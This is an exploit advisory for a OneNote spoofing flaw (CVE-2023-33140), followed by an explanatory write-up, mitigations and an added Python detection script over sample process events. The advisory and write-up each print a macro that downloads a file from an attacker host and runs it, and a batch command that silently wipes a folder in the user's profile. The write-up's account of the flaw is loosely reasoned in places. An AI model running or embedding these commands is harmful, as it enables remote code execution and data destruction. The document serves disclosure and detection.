Microsoft OneNote (Version 2305 Build 16.0.16501.20074) 64-bit - Spoofing
## Title: Microsoft OneNote (Version 2305 Build 16.0.16501.20074) 64-bit - Spoofing
## Author: nu11secur1ty
## Date: 06.22.2023
## Vendor: https://www.microsoft.com/
## Software: https://www.microsoft.com/en/microsoft-365/onenote/digital-note-taking-app
## Reference: https://portswigger.net/kb/issues/00400c00_input-returned-in-response-reflected
## Description:
Microsoft OneNote is vulnerable to spoofing attacks. An attacker can
trick the victim into clicking a maliciously crafted URL, or into
downloading and executing some other malicious file. Once that happens
the victim's computer is compromised.
Exploiting the vulnerability requires that a user open a specially
crafted file with an affected version of Microsoft OneNote and then
click on a specially crafted URL to be compromised by the attacker.
STATUS: HIGH Vulnerability
[+]Exploit:
```vbs
Sub AutoOpen()
Call Shell("cmd.exe /S /c" & "curl -s https://attacker.com/kurec.badass > kurec.badass && .\kurec.badass", vbNormalFocus)
End Sub
```
[+]Inside-exploit
```batch
@echo off
del /s /q C:%HOMEPATH%\IMPORTANT\*
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-33140)
## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/06/cve-2023-33140.html)
## Time spent:
01:15:00
-- Microsoft OneNote 2305 (Build 16.0.16501.20074) 64-bit: A Critical Spoofing Vulnerability Exploited via Malicious URL Injection
On June 22, 2023, security researcher nu11secur1ty disclosed a high-severity vulnerability in Microsoft OneNote, specifically affecting version 2305 (Build 16.0.16501.20074) for 64-bit systems. This flaw, identified as CVE-2023-33140, enables attackers to execute remote code through a spoofing attack that leverages the application's URL handling to trick users into downloading and executing malicious payloads.
Understanding the Vulnerability: How Spoofing Works in OneNote
Microsoft OneNote is widely used for digital note-taking, collaboration, and document management across enterprise and personal environments. Its core functionality includes parsing and rendering hyperlinks within notes, allowing users to click on URLs to navigate to external resources. However, this feature becomes a critical attack vector when improperly implemented.
The vulnerability stems from a reflected input issue: user-provided URLs are processed and acted on without proper sanitization. As noted in the PortSwigger KB reference [00400c00], the application returns user input in the response context, enabling attackers to inject executable commands.
When a malicious file is opened in OneNote, it can embed crafted URLs that trigger unintended actions. For example, a URL such as http://example.com/ might appear benign, but when rendered it could carry embedded script logic that executes on the victim's machine upon click.
Exploit Analysis: Malicious VBScript and Command Execution
One of the most alarming aspects of this vulnerability is the use of VBScript embedded within OneNote files to automate malicious execution. The following code snippet demonstrates how attackers exploit the system:
```vbs
Sub AutoOpen()
Call Shell("cmd.exe /S /c" & "curl -s https://attacker.com/kurec.badass > kurec.badass && .\kurec.badass", vbNormalFocus)
End Sub
```
Explanation: This VBScript subroutine is triggered automatically when the malicious OneNote file is opened. It uses the Shell function to execute a command in the Windows command prompt. The payload performs two actions:
- curl -s https://attacker.com/kurec.badass > kurec.badass: Downloads a malicious executable from a remote server.
- .\kurec.badass: Executes the downloaded file immediately.
Since the script runs with the privileges of the logged-on user, it inherits that user's access to files and network resources, and the download can look legitimate if the payload is hosted on a trusted domain or served over HTTPS.
Inside-Exploit: Deletion of Critical Data
Further evidence of the exploit’s destructive intent is revealed in the following batch script:
```batch
@echo off
del /s /q C:%HOMEPATH%\IMPORTANT\*
```
Explanation: This batch command deletes every file under the path C:%HOMEPATH%\IMPORTANT\* using del with the /s and /q switches. The /s switch recursively deletes files in subdirectories, while /q suppresses confirmation prompts. %HOMEPATH% expands to the current user's profile path (for example \Users\<name>), so the target is a folder inside the user's home directory, likely chosen to erase sensitive documents, credentials, or backups.
This demonstrates not only remote code execution but also data destruction, a hallmark of ransomware or espionage attacks. The combination of download, execution, and deletion makes this exploit particularly dangerous.
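The behaviour described in the advisory's exploit block and in the two explanations above (an Office application spawning a shell, a download redirected to a file that is then executed, and a quiet recursive delete under the user's profile) is visible in process-creation telemetry. The following detection logic is an added example, not code from the advisory or from the blog post; it assumes Sysmon Event ID 1 style fields (ParentImage, Image, CommandLine) and runs over constructed sample events.

```python
import re

# Constructed sample events (not real telemetry) in the shape of
# Sysmon Event ID 1 fields. Event 0 mirrors the advisory's AutoOpen
# payload; event 2 mirrors the inside-exploit batch file.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /S /c curl -s https://attacker.com/kurec.badass > kurec.badass && .\kurec.badass"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c dir"},
    {"ParentImage": r"C:\Users\alice\kurec.badass",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c del /s /q C:\Users\alice\IMPORTANT\*"},
]

OFFICE_PARENTS = ("onenote.exe", "winword.exe", "excel.exe", "powerpnt.exe")
DOWNLOADERS = ("curl", "certutil", "bitsadmin", "powershell", "invoke-webrequest")
# "> name && .\name": output redirected to a file that is run right away
DOWNLOAD_THEN_RUN = re.compile(r">\s*(\S+)\s*&&\s*\.\\\1")
# "del" with both /s (recursive) and /q (no prompt), in either order
QUIET_RECURSIVE_DEL = re.compile(r"\bdel\b.*\s/s\b.*\s/q\b|\bdel\b.*\s/q\b.*\s/s\b")
PROFILE_PATH = re.compile(r"\\users\\|%homepath%|%userprofile%")

def classify(event):
    """Return the names of the detections that match one process-creation event."""
    parent = event["ParentImage"].rsplit("\\", 1)[-1].lower()
    image = event["Image"].lower()
    cmd = event["CommandLine"].lower()
    hits = []
    # An Office application launching a shell is rare in normal use.
    if parent in OFFICE_PARENTS and image.endswith(("cmd.exe", "powershell.exe")):
        hits.append("office_spawns_shell")
    # A download tool whose output file is executed in the same command line.
    if any(tool in cmd for tool in DOWNLOADERS) and DOWNLOAD_THEN_RUN.search(cmd):
        hits.append("download_and_execute")
    # Unattended recursive deletion somewhere under a user profile.
    if QUIET_RECURSIVE_DEL.search(cmd) and PROFILE_PATH.search(cmd):
        hits.append("profile_data_wipe")
    return hits

def scan(events):
    """Return (index, detections) for every event that triggers at least one rule."""
    return [(i, classify(e)) for i, e in enumerate(events) if classify(e)]

if __name__ == "__main__":
    for index, detections in scan(SAMPLE_EVENTS):
        print(f"event {index}: {', '.join(detections)}")
```

The download-and-execute rule keys on the redirect-then-run shape rather than on the file name, so renaming the payload does not evade it; the wipe rule fires on the expanded path as well as on the %HOMEPATH% form used in the advisory.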
Reproduction and Proof of Concept
The vulnerability was verified and documented by nu11secur1ty in a publicly available repository on GitHub:
- GitHub Repository – Contains the malicious OneNote file, proof-of-concept scripts, and documentation.
- Blog Post – Detailed technical breakdown, timeline, and impact assessment.
These resources confirm the exploit’s reproducibility under controlled conditions, demonstrating that a user merely opening a crafted file and clicking a malicious URL is sufficient to trigger the attack.
Attack Surface and Risk Assessment
| Attack Vector | Impact | Exploitation Difficulty |
|---|---|---|
| Malicious OneNote file via email, shared drive, or phishing link | Remote code execution, data deletion, persistent backdoor | Low (requires user interaction) |
| URL injection in note content | Execution of VBScript or batch commands | Medium (requires crafted payload) |
Key Risk Factors:
- User interaction is required: attackers rely on social engineering to trick users into opening files.
- Execution with user privileges: the malware runs with user-level access, potentially escalating to admin.
- File-based delivery: malicious files can be disguised as legitimate notes, making detection difficult.
Security Recommendations and Mitigations
Given the severity of CVE-2023-33140, organizations and individuals must take immediate action:
- Update OneNote: Ensure all users are running the latest version of Microsoft OneNote. Microsoft has since released patches addressing this vulnerability.
- Disable auto-execution: Configure OneNote to disable automatic script execution. Users should be prompted before any command is executed.
- Use sandboxed environments: Open suspicious files in isolated, non-persistent environments (e.g., virtual machines).
- Implement email and file scanning: Deploy advanced antivirus and URL analysis tools to detect malicious links or file behaviors.
- Train users: Conduct regular security awareness training to recognize phishing attempts involving document-based attacks.
Conclusion: A Wake-Up Call for Digital Note-Taking Security
Microsoft OneNote's widespread adoption makes it a prime target for cyberattacks. The CVE-2023-33140 exploit underscores a critical truth: even trusted applications can become gateways to compromise if their input handling mechanisms are not rigorously secured.
As the attack demonstrates, a single click on a malicious URL in a seemingly harmless note can lead to full system compromise. This vulnerability is not just a technical flaw; it is a systemic risk that demands continuous vigilance, proactive patching, and user education.
For security professionals, this case serves as a powerful reminder: trust no input, especially when it comes from unverified sources. Always validate, sanitize, and restrict execution paths, especially in applications that handle user-generated content.